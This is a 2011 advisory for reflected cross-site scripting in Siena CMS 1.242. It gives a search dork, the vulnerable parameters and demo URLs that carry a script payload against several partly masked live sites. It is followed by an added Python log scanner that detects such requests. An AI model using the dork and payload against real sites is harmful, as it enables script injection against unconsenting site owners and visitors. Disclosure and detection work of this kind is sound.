Siena CMS (1.242) <= Cross Site scripting Vulnerabilities

2011.12.31
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

----------------------------------------------------------------
Siena CMS (1.242) <= Cross Site scripting Vulnerabilities
----------------------------------------------------------------

# Exploit Title: Siena CMS (1.242) <= Cross Site scripting Vulnerabilities
# Application Name: [Siena CMS]
# Date: 30/12/2011
# Author: BHG Security Center
# Home: Http://black-hg.org
# Software Link: [ http://www.sienacms.com ]
# Impact : [ low ]
# Dork: inurl:"index.php?page="
$ Version : [1.242]
# Tested on: [linux+apache]
# CVE : Webapps
# Finder(s):
    - Net.Edit0r (Net.edit0r [at] att [dot] net)

# Description: :
You can use this vulnerability to take malicious ~ XSS (ha.ckers.org/xss.html)

+-----------------------+
| Cross Site scripting  |
+-----------------------+

The vulnerable code is located in /index.php?err=[XSS]

Proof of Concept:
-----------------
~ PoC : http://localhost/index.php?page=[XSS]

~ Demo : http://chelseaXXXXXXXn.com/index.php?page=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
~ Demo : http://www.siXXXms.com/index.php?page=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
~ Demo : http://www.chelXXXrgallery.com/index.php?page=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
~ Demo : http://www.jessicXXXdesire.com/index.php?page=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E

[-] Disclosure timeline:

[21/12/2011] - Vulnerabilities discovered
[24/12/2011] - Other vulnerabilities discovered
[27/12/2011] - Issues reported to http://black-hg.org
[30/12/2011] - Public disclosure

# Greets To : Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ tHe.k!ll3r ~ Mr.XHat ~ Bl4ck.Viper
  b3hz4d ~ G3n3Rall ~ NoL1m1t ~ __SENATOR__ ~ NetQurd ~ Cyber C0der

THANKS TO ALL Iranian HackerZ ./Persian Gulf
===========================================[End]=============================================

References:

http://www.sienacms.com
http://black-hg.org
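
Added example (not part of the original advisory or of Siena CMS): a log check an operator of an affected site could run to find requests to index.php whose `page` or `err` parameter decodes to HTML markup characters, as in the PoC above. The combined access-log format, the function names and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters named in the advisory: `page` (PoC) and `err` (stated location).
WATCHED_PARAMS = {"page", "err"}
# Characters that let a reflected value leave an HTML attribute or text context.
HTML_BREAKOUT = re.compile(r"[<>\"']")
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(log_line):
    """Return [(param, decoded_value)] for watched params carrying markup characters."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/index.php"):
        return []
    hits = []
    # parse_qsl percent-decodes values, so %22%3E is inspected as ">
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name.lower() in WATCHED_PARAMS and HTML_BREAKOUT.search(value):
            hits.append((name, value))
    return hits

def scan(lines):
    """Return [(line_number, hits)] for every log line with at least one hit."""
    out = []
    for n, line in enumerate(lines, 1):
        hits = suspicious_params(line)
        if hits:
            out.append((n, hits))
    return out

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Dec/2011:10:00:01 +0000] "GET /index.php?page=contact HTTP/1.1" 200 5120',
    '192.0.2.77 - - [30/Dec/2011:10:00:05 +0000] "GET /index.php?page=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E HTTP/1.1" 200 5301',
    '192.0.2.10 - - [30/Dec/2011:10:00:09 +0000] "GET /style.css?page=%3Cb%3E HTTP/1.1" 200 900',
    '192.0.2.77 - - [30/Dec/2011:10:00:12 +0000] "GET /index.php?err=%3Cb%3Etest%3C/b%3E HTTP/1.1" 200 5290',
]

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG):
        print(lineno, hits)
```

A hit only shows that markup was sent in the parameter; whether it was reflected unescaped has to be confirmed against the response or the template that prints the value.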

